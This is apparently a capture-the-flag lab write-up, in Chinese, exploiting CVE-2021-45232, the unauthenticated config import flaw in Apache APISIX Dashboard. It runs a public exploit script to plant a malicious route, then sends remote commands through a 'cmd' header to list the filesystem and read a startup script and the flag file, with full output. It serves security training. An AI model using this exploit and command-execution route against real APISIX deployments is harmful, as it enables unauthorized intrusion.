CVE-2021-45232

信息

靶标介绍：

Apache APISIX Dashboard 2.10.1版本前存在两个API/apisix/admin/migrate/export和/apisix/admin/migrate/import，他们没有经过droplet框架的权限验证，导致未授权的攻击者可以导出、导入当前网关的所有配置项，包括路由、服务、脚本等。攻击者通过导入恶意路由，可以用来让Apache APISIX访问任意网站，甚至执行LUA脚本

• CVE

入口点

http://d2be512c-64d8-4116-818e-c84717dd4876-488.cyberstrikelab.com:83
http://6debfd48-6e5b-4980-9ef5-22d8aacaa18a-488.cyberstrikelab.com:83

直接使用 wuppp/cve-2021-45232-exp 进行利用

┌──(randark㉿kali)-[~/exploit/cve-2021-45232-exp]
└─$ python3 apisix_dashboard_rce.py http://d2be512c-64d8-4116-818e-c84717dd4876-488.cyberstrikelab.com:83
attack success
uri is: /LoEyH0

切换到另一个入口进行交互

┌──(randark㉿kali)-[~/exploit/cve-2021-45232-exp]
└─$ curl http://6debfd48-6e5b-4980-9ef5-22d8aacaa18a-488.cyberstrikelab.com:83/LoEyH0 -H "cmd: whoami"
nobody


┌──(randark㉿kali)-[~/exploit/cve-2021-45232-exp]
└─$ curl http://6debfd48-6e5b-4980-9ef5-22d8aacaa18a-488.cyberstrikelab.com:83/LoEyH0 -H "cmd: ls -lh /"
total 16K
-rw-r--r--    1 root root 12K Nov 13  2020 anaconda-post.log
lrwxrwxrwx    1 root root   7 Nov 13  2020 bin -> usr/bin
drwxr-xr-x    5 root root 360 Oct 30 12:13 dev
drwxr-xr-x    1 root root  86 Oct 30 12:13 etc
drwxr-xr-x    2 root root  10 Apr 11  2018 home
lrwxrwxrwx    1 root root   7 Nov 13  2020 lib -> usr/lib
lrwxrwxrwx    1 root root   9 Nov 13  2020 lib64 -> usr/lib64
drwxr-xr-x    2 root root  10 Apr 11  2018 media
drwxr-xr-x    2 root root  10 Apr 11  2018 mnt
drwxr-xr-x    2 root root  10 Apr 11  2018 opt
dr-xr-xr-x 9785 root root   0 Oct 30 12:13 proc
dr-xr-x---    1 root root  26 Sep  3  2021 root
drwxr-xr-x    1 root root  29 Oct 30 12:13 run
-rwxr-xr-x    1 root root 264 Nov 28  2024 run.sh
lrwxrwxrwx    1 root root   8 Nov 13  2020 sbin -> usr/sbin
drwxr-xr-x    2 root root  10 Apr 11  2018 srv
dr-xr-xr-x   13 root root   0 Oct 30 12:13 sys
drwxrwxrwt    1 root root  56 Oct 30 12:13 tmp
drwxr-xr-x    1 root root  27 Nov 13  2020 usr
drwxr-xr-x    1 root root  72 Nov 13  2020 var


┌──(randark㉿kali)-[~/exploit/cve-2021-45232-exp]
└─$ curl http://6debfd48-6e5b-4980-9ef5-22d8aacaa18a-488.cyberstrikelab.com:83/LoEyH0 -H "cmd: cat /run.sh"
#!/bin/bash

# 输出环境变量 $flag 的内容到 /tmp/flag.txt
echo $flag > /tmp/flag.txt

# 初始化 APISIX 和启动服务
sh -c "/usr/bin/apisix init && /usr/bin/apisix init_etcd && /usr/local/openresty/bin/openresty -p /usr/local/apisix -g 'daemon off;'"


┌──(randark㉿kali)-[~/exploit/cve-2021-45232-exp]
└─$ curl http://6debfd48-6e5b-4980-9ef5-22d8aacaa18a-488.cyberstrikelab.com:83/LoEyH0 -H "cmd: cat /tmp/flag.txt"
go-flag{bac9cfa0-aa91-4094-a625-8efa8f438560}